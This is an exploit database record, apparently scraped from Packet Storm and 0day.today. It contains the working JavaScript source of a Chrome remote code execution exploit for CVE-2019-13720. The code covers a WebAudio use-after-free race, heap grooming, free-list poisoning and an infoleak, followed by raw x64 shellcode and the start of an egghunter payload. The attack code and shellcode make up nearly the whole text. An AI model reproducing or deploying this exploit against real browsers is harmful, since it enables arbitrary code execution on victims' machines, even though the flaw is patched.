Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent. \nlet AllocCount = 0; \nMutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr); \n \n// Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated \n \ndo { \nGcPreventer.push(new ArrayBuffer(8)); \n \nif (++AllocCount > 0x100000) { \nDebugLog(\"... failed to re-claim final free list flink with alloc spray\"); \nreturn; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed \n} \n} while (MutableFreeListEntry[0] != BigInt(0)); \n \n// The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head). \n \nlet FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays. \nGcPreventer.push(FreeListHead); \nExecutePayload(FreeListHead); \nreturn; \n} \n} \n \nreturn; \n} \n \nasync function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) { \nlet NumberOfChannels = 1; \nlet TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000); \nlet AudioBufferSourceNode = TempAudioCtx.createBufferSource(); \nlet ConvolverNode = TempAudioCtx.createConvolver(); \nlet Finished = false; \n \n// Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF) \n \nlet BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000); \nlet SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000); \n \nSmallUafBuf.getChannelData(0).fill(0); \n \nfor (var i = 0; i < NumberOfChannels; i++) { \nvar ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer); \nChannelData[0] = FeedforwardAddress; \n} \n \nAudioBufferSourceNode.buffer = BigSourceBuf; \nConvolverNode.buffer = SmallUafBuf; \n \n// Setup the audio processing graph and begin rendering \n \nAudioBufferSourceNode.loop = true; \nAudioBufferSourceNode.loopStart = 0; \nAudioBufferSourceNode.loopEnd = 1; \nAudioBufferSourceNode.connect(ConvolverNode); \nConvolverNode.connect(TempAudioCtx.destination); \nAudioBufferSourceNode.start(); \n \nTempAudioCtx.startRendering().then(function(Buf) { \nBuf = null; \n \nif (Finished) { \nTempAudioCtx = null; \nsetTimeout(CallbackFunc, 200); \nreturn; \n} else { \nFinished = true; \nsetTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1); \n} \n}); \n \nwhile (!Finished) { \nConvolverNode.buffer = null; \nawait Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer \n \nif (Finished) { \nbreak; \n} \n \nfor (let i = 0; i < IIRFilters.length; i++) { \nOutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI. \nIIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray); \n \nif (OutputFloatArray[0] != 3.1415927410125732) { \nFinished = true; \nDoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/\"holding\" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. \nDoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); \nAudioBufferSourceNode.disconnect(); \nConvolverNode.disconnect(); \nreturn; \n} \n} \n \nConvolverNode.buffer = SmallUafBuf; \nawait Sleep(1); \n} \n} \n \nfunction InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) { \nSharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used) \nHelperBigInt[0] = LeakedFlinkPtr; \nDebugLog(\"... leaked free list ptr from ScriptNode audio handler at iteration \" + RenderCount.toString(10) + \": \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nHelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr); \nDebugLog(\"... Super page: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nFeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span. \nHelperBigInt[0] = FeedforwardSuperPageBase; \nDebugLog(\"... first Super Page in extent: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nHelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase); \nFeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit. \nIIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data. \nHelperBigInt[0] = IIRFilterFeedforwardAllocPtr; \nDebugLog(\"... IIRFilterFeedforwardAllocPtr: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nDoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom); \n} \n \nasync function InfoleakUAF(CallbackFunc) { \nlet TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode. \nlet AudioBufferSourceNode = TempAudioCtx.createBufferSource(); \nlet ConvolverNode = TempAudioCtx.createConvolver(); \nlet ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel. \nlet ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000); \nlet OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); \nlet Finished = false; \nlet RenderCount = 0; \n \nConvolverNode.buffer = ChannelBuf; \nAudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full \n \nAudioBufferSourceNode.loop = true; \nAudioBufferSourceNode.loopStart = 0; \nAudioBufferSourceNode.loopEnd = 1; \n \nChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread \nAudioBufferSourceNode.connect(ConvolverNode); \nConvolverNode.connect(ScriptNode); \nScriptNode.connect(TempAudioCtx.destination); \n \nAudioBufferSourceNode.start(); \n \nScriptNode.onaudioprocess = function(Evt) { \nRenderCount++; \nfor (let i = 0; i < 1; i++) { \nlet ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer); \n \nfor (let j = 0; j < ChannelInputBuf.length; j++) { \n/* \nNotably, it is not only the first frame of the input buffer which is checked for the leaked flink. \nThere are 16384 frames (each the size of a Float32) copied into the input channel buffer each \ntime this handler receives an event. Typically only 0-1 of these frames will contain a leaked \nflink freelist pointer. \n*/ \n \nif (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) { \nlet TempHelperBigInt = new BigUint64Array(1); \nlet TempHelperDword = new Uint32Array(TempHelperBigInt.buffer); \n \nTempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer \nTempHelperDword[1] = ChannelInputBuf[j + 1]; \n \nlet LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]); \n \n// Check QWORD from SharedAudioBuffer for a non-zero value \n \nif (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) { \nLeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region? \n} \n \nif (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) { \n// Valid leak: end the recursion cycle for this UAF and execute a callback \n \nFinished = true; \nEvt = null; \nAudioBufferSourceNode.disconnect(); \nScriptNode.disconnect(); \nConvolverNode.disconnect(); \nsetTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1); \nreturn; \n} \n} \n} \n} \n}; \n \nTempAudioCtx.startRendering().then(function(Buf) { \nBuf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle \n \nif (!Finished) { \nFinished = true; \nInfoleakUAF(CallbackFunc); \n \n} \n}); \n \n/* \nAttack the race condition which allows for a free list flink to be copied \ninto the ScriptNode input channel buffer: the renderer thread is receiving \ndata into the SharedBuffer in the Convolver, processing it, then copying \nit into the ScriptNode input channel until it is full (then the ScriptNode \nreceives an event). The SharedBuffer must be freed precisely between the \ntime when new data is received from the BufferSource, and the processed data \nis copied into the ScriptNode. Simply freeing the buffer will not work, \nsince the next chunk of data from the BufferSource will not be placed into \nSharedBuffer if it is NULL. However, there is no check if SharedBuffer is \nNULL when the processed data it contains is copied into the ScriptNode input. \n*/ \n \nwhile (!Finished) { \nConvolverNode.buffer = null; \nConvolverNode.buffer = ChannelBuf; \nawait Sleep(1); // 1ms \n} \n} \n \nfunction FeedforwardHeapGroom() { \nlet TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); \nlet FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data. \nlet FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data. \n \n// Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory. \n \nFeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f \nFeedforwardArray[0] = 0; // Changing these feedforward values has no affect on memory at leaked ptr \nFeedforwardArray[1] = -1; \n \nfor (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filtrs are creatd directly after page initialization. \nIIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray)); \n} \n \n// Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causess an 0x240 slot span to be created in the first Super Page. \n \nlet Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash. \n \nfor(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span. \nTempConvolver = TempAudioCtx.createConvolver(); \nAudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000); \nTempConvolver.buffer = AudioBuf; \nGcPreventer.push(AudioBuf); \nGcPreventer.push(TempConvolver); \n} \n \n// Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen. \n \nlet Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance. \n \nfor(var x = 0; x < (Bucket200Slots / 2); x++) { \nTempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size) \nGcPreventer.push(TempConvolver); \n} \n} \n \ntry { \nvar BrowserVersion = navigator.userAgent.split(\"Chrome/\")[1].split(\" Safari/\")[0]; \nMajorVersion = parseInt(BrowserVersion.substr(0, 2)); \n \nif (MajorVersion <= 78) { \nValidBrowser = true; \n \nif(MajorVersion != 76) { \nalert(\"This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version\"); \n} \n} \nelse { \nalert(\"CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser\"); \n} \n} \ncatch (e) { \nDebugLog(\"... failed to parse browser version from user agent.\"); \n} \n \nif(ValidBrowser) { \nFeedforwardHeapGroom(); \nInfoleakUAF(InfoleakUAFCallback); \n} \nelse { \nDebugLog(\"... unsupported browser version \" + navigator.userAgent); \n} \n</script> \n</html> \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167066/googlechrome780390470-exec.txt"}], "zdt": [{"lastseen": "2022-05-12T09:33:39", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "zdt", "title": "Google Chrome 78.0.3904.70 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-05-12T00:00:00", "id": "1337DAY-ID-37719", "href": "https://0day.today/exploit/description/37719", "sourceData": "# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution\n# Exploit Author: deadlock (Forrest Orr)\n# Type: RCE\n# Platform: Windows\n# Website: https://forrest-orr.net\n# Twitter: https://twitter.com/_ForrestOrr\n# Vendor Homepage: https://www.google.com/chrome/\n# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip\n# Versions: Chrome 76 - 78.0.3904.70\n# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64\n# CVE: CVE-2019-13720\n# Bypasses: DEP, High Entropy ASLR, CFG, CET\n# Github: https://github.com/forrest-orr/WizardOpium\n\n<html>\n<script>\n/*;; --------------------------------------------------------------------- |\n;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium |\n;;;; --------------------------------------------------------------------- |\n;;;; Author: deadlock (Forrest Orr) - 2022 |\n;;;; --------------------------------------------------------------------- |\n;;;; Licensed under GNU GPLv3 |\n;;;; --------------------------------------------------------------------- |\n;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 |\n;;;; 64-bit with CPU core counts: |\n;;;; ~ 16 cores (non-virtualized) | works |\n;;;; ~ 4 cores (virtualized) | works |\n;;;; ~ 2 cores (virtualized) | works |\n;;;; ~ 1 core (virtualized) | fails |\n;;;; |\n;;;; All of these tests finished successfully with a 95%+ success rate |\n;;;; with the exception of the 1 core tests, which fail with a 100% |\n;;;; frequency. Due to the nature of the exploit as both a UAF highly |\n;;;; sensitive to the state of the heap and a race condition, it appears |\n;;;; that a single core is unable to reliably reproduce the UAF or any |\n;;;; kind of consistency in the heap between executions. |\n;;;; --------------------------------------------------------------------- |\n;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET |\n;;;; --------------------------------------------------------------------- |\n;;;; ## Sandboxing |\n;;;; ~ Chrome uses an isolated content child proces running under a |\n;;;; restricted token below Low Integrity to render JavaScript. |\n;;;; ~ Child process creation is restricted via Windows exploit |\n;;;; mitigation features on the OS level for Chrome renderers. |\n;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a |\n;;;; sandbox escape (this was limited to Windows 7 since in newer |\n;;;; versions of Windows win32k syscalls are locked in Chrome for |\n;;;; security purposes). |\n;;;; ~ Run Chrome with the \"--no-sandbox\" parameter in order to execute |\n;;;; the WinExec shellcode within this exploit source. |\n;;;; --------------------------------------------------------------------- |\n;;;; ## Notes |\n;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist |\n;;;; for both infoleaks and R/W primitives. |\n;;;; ~ The exploit should in theory work in any version of Chrome up to |\n;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. |\n;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is |\n;;;; initialized resulting in the creation of a single page of +RWX |\n;;;; JIT memory. This is then overwritten with a 673 byte egghunter |\n;;;; shellcode. |\n;;;; ~ The egghunter will scan through all committed +RW regions of |\n;;;; private memory within the compromised chrome.exe renderer process |\n;;;; and mark any region it identifies as +RWX which contains the egg |\n;;;; QWORD bytes and subsequentially execute it via a CALL instruction. |\n;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 |\n;;;; array prefixed by the following egg QWORD bytes: |\n;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 |\n;;;; --------------------------------------------------------------------- |\n;;;; ## Credits |\n;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit |\n;;;; chain in the wild. |\n;;;; -------------------------------------------------------------------- */\n\nconst Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);\nconst Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 